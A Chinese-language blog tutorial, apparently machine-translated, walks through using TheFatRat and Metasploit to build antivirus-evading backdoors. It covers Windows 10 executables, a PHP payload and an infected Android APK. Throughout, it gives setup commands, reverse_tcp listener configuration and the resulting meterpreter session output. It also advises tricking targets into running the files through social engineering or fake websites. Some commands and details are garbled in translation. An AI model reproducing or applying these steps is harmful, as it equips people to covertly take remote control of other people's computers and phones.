- A+
所属分类:未分类
使用Metasploit不再是一件困难的事情。 因为互联网上有许多资源可供使用。 这告诉了metasploit的用法。 Metasploit是攻击任何过时操作系统的常用方法。 仍有许多操作系统可以远程利用。 并且有许多反病毒无法检测到这些漏洞。 我们在谈论TheFatRat。
根据国际网络安全研究所的道德黑客研究员对TheFatRat的工作进行了详细分析,以检查测试工具的内部。
TheFatRat是另一个类似于metasploit的工具,用于轻松生成后门。 此工具用于编译一些具有一些流行负载的恶意软件,然后可用于攻击Windows,MAC,Linux等操作系统。 此工具提供了许多选项,如创建后门,受感染的dll。
整个工具已在Parrot OS上测试过。 在创建了后门之后。 这些后门已在Windows 10 Build 1607和android上打开。
- 对于克隆类型https://github.com/Screetsec/TheFatRat.git
- 然后键入cd TheFatRat
- 输入chmod u + x setup.sh
- 输入./setup.sh
- 如果mono不安装类型sudo apt-get update和sudo apt-get install mono-mcs或者输入sudo apt-get install mono-devel或者输入sudo apt-get install mono-complete
- 由于某些与mono有关的依赖项没有直接安装。 所以只需运行上面的命令。
- 在安装阶段,它会要求在parrot OS中创建快捷方式。 只需在安装后输入y就可以像运行msfconsole一样运行fatrat。
- 之后输入fatrat
- 您可以使用TheFatRat提供大量选项来在目标窗口或其他平台中创建会话。
创建一个简单的漏洞来破解Windows 10: -
- Type 6将使用pwnwinds创建fud后门。
- 然后键入2 ,它将使用c#+ powershell创建fud后门。
- 输入LHOST侦听器/攻击者IP地址。 键入192.168.1.12
- 输入端口4444或任何端口号。
- 输入后门文件名tstfile
- 键入3以使用windows / meterpreter / reverse_tcp。
- 按Enter键创建后门。
- 后门创建后将保存在/home/user/Downloads/TheFatRat/output/tstfile.exe中
- 要访问后门,请转到上述位置。
- 打开另一个终端并启动msfconsole。 Msfconsole将用于处理正在进行的会话。
- 输入msfconsole
- msfconsole启动后使用exploit / multi / handler
- 然后键入set payload windows / meterpreter / reverse_tcp
- 输入LHOST 192.168.1.12
- 输入LPORT 4444
- 输入漏洞
msf5> 使用exploit / multi / handler
msf5 exploit(multi / handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
msf5 exploit(multi / handler)> 设置LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi / handler)> 设置LPORT 4444
LPORT => 4444
msf5 exploit(multi / handler)> exploit
- 现在在Windows 10中打开后门。 只需从此处复制并粘贴到Pendrive并在Windows 10中 打开 pendrive。 您还可以使用任何社交工程技术(如Fake任何网站在几秒钟内 )将此exe传递给TARGET计算机。
- 您必须复制两个文件tstfile.exe和program.cs 。 因为这个后门是使用C#创建的
- 然后双击 tstfile.exe
- 当目标点击该文件时,将弹出一个弹出窗口,然后打开meterpreter会话。
- 如下所示,meterpreter会话已在msfconsole中启动。
msf5 exploit(multi / handler)> exploit
[ ]在192.168.1.12:4444 [ ] 上启动反向TCP处理程序发送阶段(179779字节)为192.168.1.5
[*] Meterpreter会话1在2019-01-30 12:24:04 +0000开启(192.168.1.12:4444 - > 192.168.1.5:61050)
meterpreter> sysinfo
电脑:DESKTOP-2304ULE
操作系统:Windows 10(Build 16299)。
架构:x64
系统语言:en_US
领域:WORKGROUP
登录用户:2
Meterpreter:x86 / windows
meterpreter>
- 上面的目标是使用Widnows 10.由于会话已经创建,攻击者可以执行各种任务。
使用其他选项(使用C代码)轻松创建后门: -
- 类型6
- 类型6
- 类型6
- 输入LHOST侦听器/攻击者IP地址。 键入192.168.1.12
- 输入端口4444或任何端口号。
- 输入后门文件名tstfile
- 按Enter键创建后门。
- 打开另一个终端并启动msfconsole。 Msfconsole将用于处理正在进行的会话。
- 输入msfconsole
- msfconsole启动后使用exploit / multi / handler
- 然后键入set payload windows / meterpreter / reverse_tcp
- 输入LHOST 192.168.1.12
- 输入LPORT 4444
- 输入漏洞
msf5> 使用exploit / multi / handler
msf5 exploit(multi / handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
msf5 exploit(multi / handler)> 设置LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi / handler)> 设置LPORT 4444
LPORT => 4444
msf5 exploit(multi / handler)> exploit
- 作为目标在Windows 10中打开恶意文件(tstfile.exe)。将启动一个meterpreter会话。
[ ]在192.168.1.12:4444 [ ] 上启动反向TCP处理程序发送阶段(179779字节)为192.168.1.5
[*] Meterpreter会话2在2019-01-30 15:19:28 +0000开启(192.168.1.12:4444 - > 192.168.1.5:61331)
meterpreter>
- 正如您所见,meterpreter会话已在攻击者计算机中启动。 现在攻击者可以轻松操纵目标。
使用Apache + Powershell创建后门: -
- 类型6
- 输入3
- 输入LHOST侦听器/攻击者IP地址。 键入192.168.1.12
- 输入端口4444或任何端口号。
- 输入后门文件名tstfile1
- 输入3
- 按Enter键创建后门。
- 在Windows 10中打开上面创建的后门。或者欺骗目标在他们的电脑上打开上面的文件。
- 打开另一个终端并启动msfconsole。 Msfconsole将用于处理正在进行的会话。
- 输入msfconsole
- msfconsole启动后使用exploit / multi / handler
- 然后键入set payload windows / meterpreter / reverse_tcp
- 输入LHOST 192.168.1.12
- 输入LPORT 4444
- 输入漏洞
- 当目标打开后门(tstfile1.exe )时,将在Windows中创建一个新会话
[ ]发送阶段(179779字节)到192.168.1.5 [ ] Meterpreter会话3打开(192.168.1.12:4444 - > 192.168.1.5:61336)2019-01-30 15:20:01 +0000
meterpreter>
后门之间的区别在于第一个后门使用c#+ powershell,您将文件发送到目标。 第二个后门,您只需选择创建后门的选项。 另一个后门需要设置有效负载。 第三个后门使用webserver apache来创建后门。 第三个后门为攻击者提供了强大的后门。 会话不会轻易过期。 由于上述两个会话在测试时突然失效。
使用PHP注入: -
- 在这里,我们将使用PHP创建后门。 输入1
- 然后输入5
- 输入LHOST 192.168.1.7
- 然后键入端口80
- 输入文件名tstfile
- 如上图所示。 这个后门使用Windows有效负载来创建会话。
- 有效载荷创建后。 将有效负载移动到apache服务器位置。 因为这个有效载荷将使用IP地址打开。
- 输入cp tstfile.php / var / www / html
- 然后键入sudo serivce apache2 start
- 然后转到目标Windows浏览器并键入192.168.1.7/tstfile.php
- 作为目标打开上面的URL。 php脚本将在后台启动,会话将如下所示启动。
[*] Meterpreter会话1在2019-01-30 17:45:28 +0000开启(192.168.1.12:80 - > 192.168.1.5:61331)
身份信息连接
------ ------------ -----------
1 meterpreter php / linux www-data(33)@ apache2 192.168.1.7:80 - > 192.178.1.5:61331
msf exploit(处理程序)> session -i 1
meterpreter> sysinfo
电脑:DESKTOP-2304ULE
操作系统:Windows 10(Build 16299)。
架构:x64
系统语言:en_US
领域:WORKGROUP
登录用户:2
Meterpreter:x86 / windows
meterpreter>
- 打开一个URL后。 目标很容易被黑客入侵。
攻击Android设备: -
- 输入1
- 键入192.168.1.7
- 4444型
- 后门
- 输入3
- 按Enter键创建后门。
- 这是创建一个受感染的.apk文件
- 我们将在android mobile中打开后门。 这里我们使用Android 4.4 Lolipop。
- 在msfconsole中创建一个多处理程序。
- 键入use exploit / multi / handler
- 键入set payload android / meterpreter / reverse_tcp
- 键入set 192.168.1.7
- 输入set 4444
- 输入漏洞
msf5> 使用exploit / multi / handler
msf5 exploit(multi / handler)> set payload android / meterpreter / reverse_tcp
payload => android / meterpreter / reverse_tcp
msf5 exploit(multi / handler)> 设置LHOST 192.168.1.7
LHOST => 192.168.1.7
msf5 exploit(multi / handler)> 设置LPORT 4444
LPORT => 4444
msf5 exploit(multi / handler)> exploit
- 安装上面的backdoor.apk
- 由于在android中打开了backdoor.apk,因此将在msfconsole中创建一个新会话。 根据国际网络安全研究所的数字取证专家,用户在下载任何新的Android应用程序时应该谨慎,因为它可能是android木马 。
[ ]在192.168.1.7:4444 [ ] 上启动反向TCP处理程序发送阶段(70554字节)到192.168.1.12
[*] Meterpreter会话1在2019-01-31 02:04:20 +0000开启(192.168.1.7:4444 - > 192.168.1.12:58445)
meterpreter> 帮助
核心命令
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
- 输入sysinfo
meterpreter> sysinfo
电脑:localhost
操作系统:Android 4.4.2 - Linux 3.10.52-android-x86 +(i686)
Meterpreter:dalvik / android
meterpreter>
- 由于攻击者可以利用目标android设备。
2019年1月31日